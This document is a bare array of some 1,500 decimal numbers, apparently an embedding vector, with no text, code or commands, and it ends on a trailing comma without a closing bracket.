[ -0.018180672079324722, 0.04613621532917023, -0.003461320186033845, -0.0022928256075829268, -0.0025633275508880615, 0.0055646104738116264, -0.04133710637688637, 0.029177403077483177, -0.025850413367152214, 0.0031576957553625107, -0.03965889289975166, 0.016679110005497932, 0.007780150044709444, -0.00011431925668148324, 0.006731265224516392, 0.024599112570285797, -0.021743200719356537, 0.031179485842585564, -0.003571729175746441, 0.004997844807803631, 0.04778498783707619, -0.04778498783707619, -0.025835692882537842, 0.02671896293759346, -0.00016825862985569984, 0.0012697027996182442, -0.024584390223026276, 0.008310113102197647, 0.0037042200565338135, 0.014551898464560509, 0.005962082650512457, 0.008008328266441822, 0.02358335070312023, 0.013720151036977768, 0.04560625180602074, 0.006595094222575426, 0.05149472877383232, 0.05576387420296669, 0.01651717722415924, 0.019549742341041565, 0.015059779398143291, -0.042308706790208817, -0.017297400161623955, 0.00881799403578043, -0.0021952977403998375, 0.016473013907670975, 0.009635020047426224, 0.0030583275947719812, -0.010047213174402714, -0.01009873766452074, 0.024569669738411903, -0.017532939091324806, 0.004162417259067297, -0.05149472877383232, 0.017959853634238243, -0.03259271755814552, 0.04204372316598892, 0.028794651851058006, -0.013536136597394943, 0.02146349847316742, -0.020756881684064865, 0.02417219802737236, -0.0016220913967117667, 0.002303866669535637, 0.005064090248197317, 0.017061861231923103, 0.012697027996182442, 0.013749593868851662, -0.007522528991103172, 0.02049189992249012, 0.004475242458283901, -0.05647049471735954, -0.007132417522370815, 0.03203331306576729, 0.003012323984876275, -0.03845175355672836, 0.052584096789360046, 0.03653799742460251, -0.010680224746465683, 0.011121860705316067, -0.06583317369222641, 0.014080820605158806, -0.020668553188443184, 0.01448565348982811, 0.005214982200413942, 0.010091377422213554, -0.022199558094143867, -0.07690350711345673, -0.0240985918790102, -0.02739613875746727, 0.013867363333702087, 0.013374202884733677, 0.008089294657111168, 0.013293236494064331, -0.0005916078807786107, 0.019770560786128044, -0.006723904516547918, -0.021375171840190887, -0.03730349987745285, -0.0028761529829353094, -0.05046424642205238, -0.04039495065808296, 0.026674799621105194, 0.023627514019608498, 0.007971525192260742, 0.004151375964283943, 0.02829413115978241, -0.025099633261561394, 0.011085057631134987, 0.12907540798187256, 0.0169588141143322, -0.029530711472034454, -0.014294277876615524, -0.007684462238103151, 0.006009926553815603, 0.039894431829452515, -0.015648627653717995, -0.016576062887907028, -0.014279556460678577, -0.038098447024822235, -0.004397956188768148, -0.015795839950442314, -0.0005681460024788976, 0.035684168338775635, -0.01862230710685253, 0.05920863524079323, -0.01013554073870182, 0.005019926466047764, -0.03430037945508957, -0.016576062887907028, -0.037951234728097916, -0.023745283484458923, 0.01569279097020626, 0.007522528991103172, 0.007699183654040098, -0.02710171416401863, -0.013285876251757145, 0.016266917809844017, 0.014853683300316334, 0.010039852932095528, -0.08779718726873398, -0.0457829087972641, 0.04584179073572159, -0.028647439554333687, -0.01636996492743492, -0.0068711163476109505, -0.011872641742229462, 0.020006099715828896, -0.03215108439326286, -0.02574736438691616, -0.016237474977970123, -0.016944091767072678, 0.025394055992364883, 0.0001666484895395115, 0.05864923074841499, 0.0026590153574943542, 0.01717963069677353, 0.042809225618839264, -0.043044764548540115, -0.008648700080811977, 0.0017720635514706373, -0.014625504612922668, 0.012777994386851788, -0.023745283484458923, -0.023995542898774147, -0.012299556285142899, 0.004732863046228886, 0.030826175585389137, 0.0010332437232136726, 0.028470786288380623, -0.006985205691307783, 0.00161841104272753, 0.005660298280417919, 0.019078664481639862, -0.05538112297654152, 0.00326442439109087, 0.013764314353466034, 0.04961041733622551, -0.04233814775943756, -0.01433844119310379, -0.007080893497914076, 0.009119778871536255, -0.001954238163307309, -0.013087139464914799, 0.010923124849796295, -0.014272196218371391, 0.03176833316683769, -0.02642454020678997, 0.027484465390443802, -0.025776807218790054, 0.0064810048788785934, -0.004902157001197338, -0.012432047165930271, 0.00833219476044178, 0.06283004581928253, -0.01148989051580429, -0.038157328963279724, -0.00825858861207962, -0.012255392037332058, 0.0018263478996232152, 0.013558218255639076, -0.011357399635016918, 0.002918476238846779, 0.016458293423056602, -0.021875690668821335, -0.002905595349147916, -0.015251155011355877, 0.042367592453956604, 0.022317327558994293, -0.004644535947591066, -0.01567807048559189, -0.03001650981605053, 0.008656061254441738, -0.027484465390443802, -0.0059142387472093105, 0.005505725741386414, -0.006576692685484886, -0.0009642380755394697, 0.021227959543466568, -0.006249146070331335, 0.016237474977970123, 0.005767026916146278, 0.021640151739120483, -0.013079779222607613, -0.03733294457197189, -0.0015236433828249574, 0.006146097555756569, 0.0073789977468550205, -0.017061861231923103, 0.013653906062245369, 0.005678699817508459, 0.012167065404355526, 0.004548848140984774, 0.0033398703671991825, 0.024864094331860542, -0.0030601678881794214, -0.016252195462584496, -0.00870758481323719, 0.003604851895943284, -0.0027381416875869036, 0.00037493035779334605, 0.046577852219343185, -0.010739109478890896, 0.0046003726311028, 0.004055688623338938, 0.042308706790208817, -0.03430037945508957, -0.029103796929121017, -0.021434055641293526, 0.008847436867654324, -0.005376915447413921, -0.02025636099278927, 0.002651654649525881, 0.0020775282755494118, -0.019196433946490288, 0.001434396137483418, 0.016634946689009666, -0.0003277765354141593, -0.010076656006276608, -0.015148106962442398, 0.009855838492512703, -0.019873609766364098, -0.017768478021025658, 0.002375632291659713, 0.002561487490311265, -0.019005058333277702, -0.01794513314962387, 0.02040357142686844, -0.00733851408585906, -0.008884239010512829, 0.017547661438584328, -0.007721265312284231, -0.022346770390868187, -0.029619038105010986, -0.028794651851058006, -0.016016656532883644, -0.011960968375205994, 0.009936804883182049, 0.018798962235450745, 0.020094426348805428, -0.007500447332859039, 0.00281358789652586, -0.02281784825026989, 0.038775619119405746, 0.013175467029213905, 0.01129115466028452, 0.007610856555402279, 0.00043105491204187274, -0.0018659110646694899, 0.01697353459894657, 0.018033459782600403, 0.030590636655688286, -0.06026856228709221, 0.014132344163954258, 0.020697996020317078, 0.02589457668364048, -0.0017030579037964344, 0.02964848093688488, -0.01794513314962387, 0.010989369824528694, -0.0010019611800089478, -0.002368271816521883, -0.007890558801591396, -0.006216023582965136, -0.032386623322963715, 0.013528775423765182, -0.035831380635499954, -0.010194425471127033, -0.027940822765231133, 0.004644535947591066, 0.03483033925294876, -0.049345437437295914, -0.03930558264255524, 0.0003512384428177029, 0.001020362600684166, -0.020668553188443184, -0.026144837960600853, -0.0038863946683704853, -0.02477576583623886, 0.008052492514252663, -0.011585578322410583, 0.002519164001569152, -0.031267810612916946, -0.0023020263761281967, 0.013646544888615608, -0.025555988773703575, -0.009509890340268612, 0.04569458216428757, -0.08049547672271729, 0.017547661438584328, 0.0029718405567109585, -0.016016656532883644, 0.009693904779851437, -0.03842231258749962, 0.01242468599230051, -0.03288714215159416, -0.014058738015592098, -0.010937845334410667, 0.03733294457197189, 0.005936320871114731, -0.006779109127819538, 0.009480447508394718, 0.02717532031238079, -0.0036342942621558905, -0.01704714074730873, -0.025776807218790054, 0.01876951940357685, -0.022170115262269974, 0.016237474977970123, 0.008457324467599392, 0.0008993728552013636, 0.038304541260004044, 0.0008989127818495035, -0.0007309992215596139, 0.0029037550557404757, 0.005019926466047764, -0.010179704055190086, -0.016782158985733986, 0.0005603253957815468, 0.011931526474654675, 0.028485506772994995, -0.03668520972132683, -0.008803272619843483, 0.0343887060880661, -0.003054647473618388, 0.023553907871246338, -0.0017453813925385475, -0.0038238295819610357, -0.015781117603182793, -0.017532939091324806, -0.02852967008948326, 0.01965279132127762, -0.03324045240879059, 0.029928183183073997, -0.0035294059198349714, -0.01689992845058441, 0.01772431470453739, 0.021522382274270058, -0.02905963361263275, 0.0043390714563429356, -0.03338766470551491, 0.010466767475008965, 0.02911851741373539, -0.03739182651042938, 0.03176833316683769, 0.047696661204099655, -0.03100283071398735, 0.03912892937660217, -0.019947215914726257, -0.03468312695622444, -0.023023944348096848, 0.05726543813943863, -0.0406893752515316, -0.05202469229698181, -0.014308998361229897, 0.020153312012553215, -0.011615020222961903, -0.006381636951118708, 0.009657101705670357, -0.05697101354598999, 0.027499187737703323, 0.007640298921614885, -0.009767510928213596, 0.016031378880143166, -0.016266917809844017, 0.03377041593194008, 0.030590636655688286, 0.007669741287827492, 0.03818677365779877, 0.0111439423635602, 0.022022902965545654, -0.022022902965545654, -0.02378944680094719, -0.016605503857135773, 0.04466409608721733, 0.02175792120397091, -0.0019928812980651855, 0.008052492514252663, -0.05823703482747078, 0.014559258706867695, -0.015030337497591972, 0.0033453910145908594, 0.013484612107276917, 0.02183152735233307, 0.04601844772696495, 0.041690416634082794, -0.015501415356993675, 0.003260744037106633, 0.028838815167546272, -0.027528628706932068, 0.008692864328622818, -0.015089222230017185, 0.004342751577496529, 0.010069295763969421, 0.017694873735308647, -0.033299338072538376, -0.022390933707356453, -0.03965889289975166, 0.0018456694670021534, -0.011416284367442131, -0.021492941305041313, 0.015022976323962212, 0.011497250758111477, 0.027955543249845505, 0.04080714285373688, -0.06971956789493561, -0.02297978103160858, -0.027263646945357323, 0.03070840612053871, -0.014529816806316376, -0.005130335222929716, 0.016001936048269272, 0.022052345797419548, -0.008449964225292206, 0.0034594801254570484, 0.01921115629374981, -0.004453160800039768, -0.008575094863772392, 0.025791527703404427, 0.0011914964998140931, -0.008354276418685913, 0.029442384839057922, -0.01787152700126171, -0.004519405774772167, 0.022950338199734688, 0.020300524309277534, 0.005796469282358885, 0.0028522310312837362, 0.0016809761291369796, -0.013587660156190395, 0.015928329899907112, 0.007172900717705488, 0.011055615730583668, -0.0027510228101164103, 0.013160745613276958, 0.022008182480931282, -0.009664462879300117, 0.002846710616722703, 0.0010010410333052278, -0.04366305470466614, -0.012417325749993324, -0.008803272619843483, 0.002819108311086893, 0.016679110005497932, 0.0037189412396401167, 0.014757995493710041, -0.005042008124291897, -0.010481488890945911, 0.005306989885866642, 0.008346916176378727, 0.03188610076904297, 0.023553907871246338, -0.006543569732457399, -0.018180672079324722, 0.003488922491669655, 0.00461877416819334, -0.013182827271521091, -0.00423970352858305, 0.032622162252664566, 0.016458293423056602, -0.003599331481382251, -0.02897130697965622, -0.0007949443534016609, 0.0016202512197196484, 0.022258441895246506, -0.018254278227686882, -0.03232773765921593, 0.028706325218081474, -0.02267063595354557, -0.023671677336096764, -0.020006099715828896, -0.016944091767072678, -0.0074231610633432865, -0.046283427625894547, 0.020904092118144035, -0.020241638645529747, 0.01162974163889885, -0.0029037550557404757, 0.01440468616783619, 0.008376358076930046, -0.011386842466890812, -0.01988833025097847, -0.003457640064880252, 0.0363319031894207, 0.020462457090616226, 0.03220997005701065, 0.00696312403306365, 0.0032938667573034763, -0.009988328441977501, -0.021654874086380005, 0.007088254205882549, -0.006823272444307804, -0.0035698891151696444, 0.044016364961862564, 0.0043574729934334755, -0.026925060898065567, -0.020359408110380173, 0.03594915196299553, -0.008678142912685871, -0.03285770118236542, -0.02889770083129406, 0.05623495206236839, -0.013050336390733719, -0.0024069149512797594, -0.02814691886305809, 0.05226023122668266, -0.008825354278087616, 0.022493980824947357, -0.031120600178837776, -0.007544611115008593, 0.02320059947669506, -0.0034778816625475883, 0.014308998361229897, 0.006536209490150213, 0.0007273189257830381, 0.008023049682378769, -0.0065030865371227264, 0.019049223512411118, 0.01717963069677353, 0.024819929152727127, 0.008567733690142632, -0.014419407583773136, -0.01190208364278078, -0.03533086180686951, -0.015427809208631516, 0.007559332065284252, -0.007091934327036142, 0.012306916527450085, -0.039747219532728195, 0.006079852115362883, 0.007099295035004616, -0.0029221565928310156, 0.02880937233567238, -0.020226918160915375, 0.006734945345669985, 0.00892840325832367, -0.009885280393064022, -0.016119705513119698, -0.022611750289797783, -0.021375171840190887, 0.01475063432008028, -0.04301532357931137, -0.013109221123158932, 0.023848330602049828, 0.010113459080457687, -0.03147390857338905, 0.014478292316198349, 0.011085057631134987, 0.00515977805480361, -0.012328998185694218, -0.02003554254770279, 0.001338708447292447, 0.00036572961835190654, -0.008862157352268696, -0.005060409661382437, -0.001991041237488389, 0.016031378880143166, 0.020315244793891907, -0.00737531716004014, -0.023480301722884178, -0.024363573640584946, 0.04024773836135864, -0.02875048853456974, -0.03062007948756218, -0.004714461974799633, 0.015206991694867611, 0.01807762309908867, 0.001494201016612351, -0.0426325723528862, 0.04201428219676018, -0.008582455106079578, 0.03624357655644417, 0.07549027353525162, -0.005781748332083225, 0.014632864855229855, 0.0003227161359973252, 0.030443426221609116, -0.0006739545497111976, 0.0026001306250691414, 0.01589888706803322, 0.027131156995892525, -0.03930558264255524, 0.011511972174048424, -0.01712074689567089, 0.01589888706803322, 0.03468312695622444, 0.00001883277582237497, -0.03589026629924774, -0.009266990236938, -0.022243721410632133, -0.027646398171782494, 0.026321491226553917, -0.0013405485078692436, -0.03371153026819229, -0.01651717722415924, 0.019328925758600235, 0.021331006661057472, 0.019270040094852448, -0.022052345797419548, 0.005752305965870619, 0.00799360778182745, -0.0027160600293427706, -0.02852967008948326, 0.007780150044709444, -0.019726397469639778, 0.013307957910001278, 0.024746324867010117, -0.009465726092457771, -0.008030409924685955, 0.03368208929896355, -0.039452794939279556, -0.02613011561334133, 0.02162543125450611, 0.015575021505355835, 0.033211007714271545, -0.012829518876969814, 0.0544978529214859, 0.0390111580491066, 0.004250744357705116, -0.013624463230371475, 0.026395097374916077, -0.061593469232320786, -0.01688520796597004, -0.013948329724371433, 0.008943124674260616, 0.0028816733974963427, -0.028986027464270592, -0.017164910212159157, 0.0015558459563180804, -0.004607733339071274, -0.015148106962442398, -0.020388850942254066, -0.004191859625279903, 0.013271154835820198, 0.01807762309908867, -0.020697996020317078, -0.002743662102147937, 0.007496767211705446, -0.02281784825026989, -0.011497250758111477, 0.0007250187336467206, 0.0037686252035200596, 0.003054647473618388, 0.002666375832632184, -0.012144983746111393, 0.006676060613244772, 0.0025872495025396347, -0.0015779277309775352, -0.025762086734175682, -0.03462424501776695, 0.005807510111480951, 0.0072391461580991745, 0.01816595159471035, 0.05155361443758011, -0.0015236433828249574, -0.041778743267059326, 0.02620372176170349, -0.020830485969781876, -0.02635093405842781, -0.01475063432008028, -0.02305338717997074, 0.014426767826080322, -0.013160745613276958, -0.024643275886774063, 0.01982944644987583, 0.03229829668998718, -0.003411636222153902, -0.019196433946490288, 0.010017771273851395, -0.023995542898774147, -0.011710708029568195, 0.015251155011355877, -0.029147960245609283, 0.00604304950684309, -0.003006803570315242, -0.016855765134096146, -0.010312194935977459, -0.016693832352757454, 0.0026222122833132744, 0.02875048853456974, -0.020168032497167587, -0.010407882742583752, -0.019608628004789352, -0.023097550496459007, 0.012888403609395027, -0.014308998361229897, 0.022626472637057304, 0.002611171454191208, -0.009281711652874947, 0.010790633969008923, -0.01965279132127762, -0.027881937101483345, 0.03686186671257019, 0.009767510928213596, -0.018651749938726425, -0.01868119277060032, 0.018416211009025574, -0.02303866483271122, -0.006639257539063692, 0.018872568383812904, -0.019270040094852448, 0.0005483644199557602, 0.0011096098460257053, -0.009635020047426224, -0.0062601868994534016, -0.02342141605913639, 0.003485242137685418, -0.002877993043512106, -0.021581267938017845, 0.03212163969874382, 0.007905280217528343, 0.014853683300316334, 0.022994501516222954, -0.026468703523278236, -0.0222878847271204, -0.015884166583418846, 0.01635524444282055, -0.02393665909767151, 0.004397956188768148, -0.035772498697042465, -0.014581340365111828, 0.010113459080457687, 0.006734945345669985, 0.021507661789655685, -0.0035054839681833982, 0.00699624652042985, -0.010797994211316109, -0.02296506054699421, 0.02072743885219097, -0.020462457090616226, 0.004081450402736664, -0.010290113277733326, -0.00743052177131176, -0.00900200940668583, 0.02560015395283699, -0.015604463405907154, 0.00694104190915823, 0.02739613875746727, 0.017150189727544785, 0.010533013381063938, -0.05567554756999016, -0.0041992198675870895, -0.03721517324447632, 0.008921042084693909, 0.017959853634238243, -0.00923018716275692, 0.015368924476206303, -0.01344044879078865, 0.006775428541004658, 0.0035091640893369913, 0.0025670079048722982, -0.004604052752256393, 0.036596883088350296, -0.01054773386567831, -0.0315033495426178, -0.007191302254796028, 0.006955763325095177, 0.020094426348805428, -0.019122827798128128, -0.03615524619817734, 0.024864094331860542, 0.022390933707356453, -0.010474128648638725, -0.04569458216428757, 0.006149778142571449, -0.005237064324319363, -0.025570711120963097, 0.010797994211316109, -0.032622162252664566, 0.01800401881337166, -0.008317473344504833, 0.007452603429555893, 0.025791527703404427, 0.0018677512416616082, 0.033063799142837524, -0.016988255083560944, 0.022317327558994293, -0.008575094863772392, -0.017076583579182625, 0.002322267973795533, -0.020300524309277534, -0.003453959710896015, 0.01238788291811943, -0.06989622116088867, 0.0064810048788785934, 0.003672937396913767, 0.01935836672782898, 0.015089222230017185, 0.038304541260004044, -0.004721822217106819, -0.012932566925883293, 0.02476104535162449, -0.016119705513119698, 0.003628773847594857, -0.014566619880497456, 0.02710171416401863, -0.006676060613244772, 0.012939928099513054, -0.026306770741939545, 0.032092198729515076, -0.03017844446003437, -0.02950126864016056, -0.009186023846268654, -0.022876732051372528, -0.014456210657954216, -0.021566545590758324, -0.008663421496748924, -0.013138663955032825, -0.004350112285465002, 0.006823272444307804, 0.012056656181812286, 0.03594915196299553, 0.02080104500055313, 0.00598784489557147, -0.020374130457639694, 0.008575094863772392, -0.007897919975221157, 0.0015843682922422886, 0.02875048853456974, -0.018651749938726425, 0.02378944680094719, 0.005579331889748573, -0.021492941305041313, 0.01697353459894657, 0.002960799727588892, -0.008177622221410275, -0.009495168924331665, -0.03518364951014519, 0.0007383598131127656, 0.00875174906104803, -0.010783272795379162, -0.02184624969959259, 0.00042093408410437405, 0.019049223512411118, -0.025717923417687416, 0.002850390737876296, -0.012564537115395069, -0.024981863796710968, -0.0007540010847151279, 0.010783272795379162, -0.00010707366891438141, 0.023553907871246338, -0.004191859625279903, 0.011651823297142982, 0.007058811839669943, -0.04849160835146904, -0.005616134963929653, -0.02025636099278927, -0.03748015686869621, -0.006227064412087202, 0.011718069203197956, 0.004213941283524036, -0.05105309560894966, -0.01913755014538765, 0.037274058908224106, 0.057972054928541183, 0.016016656532883644, -0.018136508762836456, -0.01614914834499359, -0.0008004648261703551, -0.010724388062953949, -0.005958402529358864, 0.008000968024134636, -0.004254424478858709, -0.010812715627253056, 0.01065814308822155, 0.031179485842585564, 0.012748552486300468, -0.016929371282458305, 0.02281784825026989, 0.023509744554758072, 0.015589742921292782, -0.01974111795425415, -0.06530320644378662, 0.0007038569892756641, -0.013381564058363438, -0.02823524735867977, 0.023509744554758072, 0.0007194982608780265, 0.06653978675603867, 0.012505652382969856, -0.0023167475592345, -0.004611413460224867, 0.020536063238978386, -0.010047213174402714, -0.009171302430331707, -0.0203446876257658, 0.01809234544634819, -0.016001936048269272, 0.03818677365779877, -0.0032515432685613632, -0.023244762793183327, -0.008207065053284168, 0.021124910563230515, 0.04104268178343773, -0.013087139464914799, -0.03017844446003437, -0.007298030890524387, -0.005638216622173786, -0.04083658754825592, -0.0019100747304037213, 0.0193730890750885, 0.00814817938953638, 0.009009369648993015, 0.0016423329943791032, 0.019873609766364098, 0.0006192101282067597, -0.02012386918067932, -0.012520373798906803, -0.013462530449032784, -0.018107065930962563, -0.02642454020678997, -0.014640226028859615, -0.029030190780758858, -0.02935405634343624, 0.006466283462941647, -0.010672864504158497, -0.0324455089867115, -0.005940000992268324, 0.023539185523986816, 0.007566692773252726, 0.02296506054699421, -0.008251228369772434, -0.020742159336805344, 0.020020822063088417, 0.015663348138332367, -0.02838245779275894, -0.00230754679068923, -0.038746178150177, -0.021640151739120483, 0.005851673893630505, -0.01523643359541893, 0.03385874256491661, 0.029663201421499252, 0.009215466678142548, 0.038098447024822235, -0.0028209483716636896, -0.03218052536249161, -0.007452603429555893, 0.006558291148394346, 0.00044623613939620554, -0.005060409661382437, 0.054762836545705795, -0.012306916527450085, -0.013285876251757145, -0.03162112087011337, -0.0039710416458547115, 0.019917773082852364, -0.012409964576363564, 0.00279518635943532, -0.006672380492091179, 0.024422457441687584, 0.015413087792694569, -0.04969874396920204, 0.033063799142837524, 0.02905963361263275, 0.016531899571418762, -0.03191554546356201, -0.021964019164443016, -0.03550751507282257, -0.049580976366996765, -0.02281784825026989, 0.0037207813002169132, -0.012858961708843708, -0.022096509113907814, 0.008192343637347221, 0.015067140571773052, 0.019623348489403725, -0.003919517621397972, 0.00937739945948124, -0.01538364589214325, -0.0030086436308920383, 0.021669594570994377, -0.008045131340622902, -0.008435242809355259, -0.02777888998389244, -0.03803956136107445, 0.024363573640584946, -0.0013304277090355754, 0.03300491347908974, -0.03309324011206627, 0.022390933707356453, -0.020536063238978386, 0.010488849133253098, 0.0025670079048722982, 0.02633621357381344, 0.0033398703671991825, 0.003960000816732645, 0.020226918160915375, 0.015427809208631516, 0.016104985028505325, 0.019755840301513672, 0.0022633832413703203, 0.013948329724371433, 0.004077770281583071, -0.012100819498300552, 0.02041829377412796, -0.014066099189221859, -0.017061861231923103, 0.012962009757757187, 0.03895227611064911, 0.006344833876937628, -0.03733294457197189, -0.022479260340332985, -0.013388924300670624, 0.01607554219663143, 0.019623348489403725, 0.010290113277733326, -0.010665503330528736, -0.013499333523213863, 0.005468922667205334, -0.003479721723124385, 0.05361458286643028, -0.016237474977970123, -0.007058811839669943, -0.007003607228398323, -0.0007641218835487962, -0.017680151388049126, 0.0157516747713089, -0.029736807569861412, -0.012866321951150894, -0.02814691886305809, 0.01028275303542614, -0.02875048853456974, -0.022538146004080772, -0.03798067569732666, -0.007180261425673962, 0.007459964137524366, -0.01062134001404047, 0.01339628454297781, 0.0034079558681696653, 0.00656565185636282, -0.018592866137623787, -0.014286916702985764, 0.0421614944934845, -0.0009863198501989245, -0.0017941453261300921, -0.0055646104738116264, -0.007437882479280233, -0.02214067243039608, -0.018902011215686798, -0.017989296466112137, -0.000253020494710654, 0.04074826091527939, -0.03871673345565796, -0.006587733514606953, -0.003365632612258196, -0.021434055641293526, 0.01772431470453739, 0.020815765485167503, -0.014551898464560509, -0.024599112570285797, 0.02671896293759346, -0.014919928275048733, -0.033740971237421036, -0.01163710281252861, 0.015707511454820633, 0.06312447041273117, 0.010761191137135029, -0.008700224570930004, -0.01340364571660757, 0.004044647328555584, 0.0059326402842998505, 0.019314203411340714, 0.009988328441977501, -0.007559332065284252, 0.0052996291778981686, 0.028779931366443634, -0.006937361788004637, 0.013315318152308464, 0.0023333090357482433, -0.007007287349551916, 0.009458365850150585, -0.020815765485167503, -0.02635093405842781, 0.004622454289346933, 0.003380353795364499, 0.011048254556953907, 0.00814817938953638, 0.019270040094852448, -0.017768478021025658, 0.016119705513119698, -0.008898960426449776, -0.0035478072240948677, -0.037421271204948425, -0.011121860705316067, -0.008023049682378769, 0.0058921570889651775, 0.01121754851192236, -0.0025578071363270283, 0.0011197306448593736, 0.026660079136490822, 0.003200019244104624, 0.013558218255639076, -0.0147138312458992, -0.0035938110668212175, -0.018107065930962563, 0.016252195462584496, 0.0067091831006109715, -0.009458365850150585, -0.009980968199670315, 0.0027565432246774435, -0.02873576618731022, 0.04210260882973671, 0.019991379231214523, -0.002458438975736499, -0.014507735148072243, -0.0012715429766103625, -0.026763128116726875, 0.032386623322963715, 0.03447703272104263, -0.0032257812563329935, -0.0023829929996281862, -0.01152669358998537, -0.009635020047426224, -0.006425800267606974, -0.018107065930962563, -0.015221713110804558, 0.0006353114731609821, -0.008685503154993057, 0.011195466853678226, 0.005954722408205271, -0.040277183055877686, -0.013867363333702087, 0.011504611931741238, 0.02138989232480526, 0.03565472736954689, 0.0007268588524311781, -0.000625190616119653, 0.00885479710996151, 0.0025541267823427916, 0.002988402033224702, 0.028691602870821953, -0.007143458351492882, 0.003098811022937298, -0.03273992985486984, -0.010952566750347614, 0.013278515078127384, 0.014669667929410934, 0.010555095039308071, 0.031238369643688202, -0.011644463054835796, 0.026822011917829514, -0.004534127190709114, 0.006190261337906122, 0.007305391598492861, 0.004648216534405947, -0.001208977890200913, 0.01688520796597004, 0.016914648935198784, -0.0008105856250040233, 0.023612791672348976, 0.03100283071398735, -0.01073174923658371, -0.01809234544634819, -0.0018567104125395417, -0.010709667578339577, 0.027867216616868973, -0.010636061429977417, 0.011946246959269047, 0.006197622045874596, -0.01719435304403305, 0.00041679374407976866, 0.006701822858303785, 0.0009743589325807989, 0.013734872452914715, -0.009642381221055984, -0.048079412430524826, -0.04413413256406784, -0.0005704461946152151, -0.027381418272852898, -0.013749593868851662, 0.00276942434720695, -0.0032405024394392967, 0.010930485092103481, 0.0014040337409824133, -0.029398221522569656, -0.031238369643688202, -0.018740078434348106, 0.02072743885219097, -0.009119778871536255, -0.00892840325832367, 0.016752716153860092, 0.0006293309852480888, -0.0016800560988485813, 0.04722558334469795, 0.047696661204099655, 0.02378944680094719, -0.0031429745722562075, -0.020756881684064865, -0.02402498573064804, 0.03603747859597206, -0.03745071217417717, 0.009701265953481197, 0.018592866137623787, 0.0222878847271204, -0.003838550765067339, -0.009451005607843399, 0.03218052536249161, 0.024510784074664116, 0.012196507304906845, 0.026925060898065567, 0.011813757009804249, 0.032681047916412354, 0.006878477055579424, -0.0026737365406006575, 0.017017697915434837, -0.008104016073048115, -0.024128034710884094, -0.0021732160821557045, 0.03730349987745285, 0.010032492689788342, 0.00934059638530016, 0.016193311661481857, -0.019976656883955002, -0.003875353839248419, 0.014853683300316334, 0.000887411879375577, 0.02514379657804966, 0.014640226028859615, -0.03377041593194008, -0.00017216894775629044, 0.03129725530743599, -0.001595409237779677, -0.042662013322114944, -0.020329967141151428, -0.028426621109247208, 0.007047770544886589, 0.013860002160072327, -0.004272826015949249, 0.02199346013367176, 0.005767026916146278, 0.012174425646662712, -0.009281711652874947, 0.0007793030817992985, 0.034712571650743484, -0.012851600535213947, -0.005958402529358864, 0.03695019334554672, 0.006911599542945623, 0.0053180307149887085, 0.03332877904176712, -0.010533013381063938, 0.009311153553426266, 0.02027108147740364, -0.02162543125450611, 0.021404612809419632, 0.012601340189576149, 0.027661120519042015, -0.029633760452270508, -0.029015470296144485, -0.020006099715828896, -0.00512297498062253, -0.01152669358998537, -0.01981472410261631, -0.017400449141860008, 0.027484465390443802, -0.0008455484639853239, -0.004375874530524015, -0.018357327207922935, 0.01822483539581299, 0.0006610735435970128, -0.02776416763663292, -0.014102902263402939, 0.008972566574811935, -0.023480301722884178, -0.012505652382969856, -0.018180672079324722, 0.02919212356209755, 0.021227959543466568, 0.005391636397689581, 0.004846952389925718, -0.005476283375173807, 0.012800076976418495, -0.01734156347811222, 0.004780706949532032, 0.0465189665555954, -0.01809234544634819, 0.02523212321102619, 0.01816595159471035, 0.004968402441591024, 0.0018677512416616082, -0.011431005783379078, 0.03226885199546814, -0.025497104972600937, -0.009745429269969463, -0.011769592761993408, -0.004854313097894192, 0.01201249286532402, 0.004316989798098803, 0.015398367308080196, -0.009576135315001011, -0.013734872452914715, 0.005998885724693537, -0.009782232344150543, -0.018254278227686882, -0.01252773404121399, 0.003562528407201171, -0.0047255028039216995, -0.012365801259875298, 0.00878119096159935, -0.025688480585813522, -0.00026935181813314557, -0.0028761529829353094, 0.012446767650544643, 0.0010314035462215543, 0.02776416763663292, -0.018725356087088585, 0.0007673421641811728, -0.016090262681245804, 0.0017573422519490123, -0.000855209247674793, 0.021139631047844887, 0.02305338717997074, 0.003912156913429499, 0.014389965683221817, -0.000031138770282268524, -0.003361952258273959, -0.02177264355123043, -0.0051560974679887295, 0.005181859713047743, -0.01613442599773407, 0.03106171451508999, -0.002042565494775772, -0.0043574729934334755, -0.00031512550776824355, 0.00068959582131356, 0.03603747859597206, 0.02333308942615986, 0.02746974490582943, -0.018268998712301254, -0.01688520796597004, 0.0010194425703957677, 0.008059852756559849, -0.010187065228819847, -0.016531899571418762, 0.006392677780240774, -0.016311081126332283, 0.04681339114904404, -0.004070409573614597, -0.010974648408591747, 0.007559332065284252, -0.013293236494064331, -0.0331815667450428, 0.002368271816521883, -0.009907362051308155, -0.01779792085289955, 0.0005630856030620635, 0.005711822770535946, -0.008619258180260658, -0.011475169099867344, 0.016796879470348358, 0.005836952477693558, -0.005108253564685583, 0.03777457773685455, -0.0040152049623429775, -0.006028328090906143, 0.01981472410261631, 0.010643421672284603, 0.03954112157225609, 0.015869444236159325, -0.02078632265329361, -0.003030725521966815, -0.016929371282458305, -0.002870632568374276, 0.013418366201221943, -0.024790488183498383, 0.016929371282458305, -0.016001936048269272, -0.002375632291659713, -0.02807331271469593, 0.021331006661057472, -0.002261543180793524, -0.0039931233040988445, 0.001337788300588727, 0.004431078676134348, 0.005936320871114731, 0.009517250582575798, -0.009473087266087532, -0.037421271204948425, -0.028279410675168037, -0.009473087266087532, 0.006974164862185717, 0.0009752789628691971, -0.005767026916146278, 0.007743346970528364, -0.032239411026239395, 0.02177264355123043, 0.037185732275247574, 0.02686617523431778, 0.010820075869560242, 0.004828550852835178, 0.007183941546827555, 0.0039489599876105785, -0.0028761529829353094, -0.004044647328555584, -0.006845354568213224, -0.02019747532904148, 0.03639078512787819, -0.015251155011355877, -0.0017601025756448507, 0.021434055641293526, 0.019034501165151596, 0.00017377907352056354, 0.0033343499526381493, -0.00032754652784205973, -0.02124268002808094, -0.028043871745467186, -0.012755912728607655, -0.011843198910355568, 0.013712790794670582, 0.005767026916146278, 0.02536461316049099, 0.011740150861442089, 0.01448565348982811, 0.003054647473618388, -0.01982944644987583, -0.006212342996150255, 0.00896520633250475, -0.006212342996150255, 0.007095614448189735, 0.0175623819231987, 0.017002977430820465, -0.021227959543466568, 0.016458293423056602, 0.0012623422080650926, -0.005873755551874638, -0.014205950312316418, 0.007331153843551874, -0.00276758405379951, -0.007272269111126661, -0.007691822946071625, 0.020241638645529747, 0.028632719069719315, -0.002901914995163679, -0.008589815348386765, 0.03347599133849144, 0.011872641742229462, 0.0010691265342757106, 0.007022008765488863, -0.012704389169812202, -0.05755986273288727, 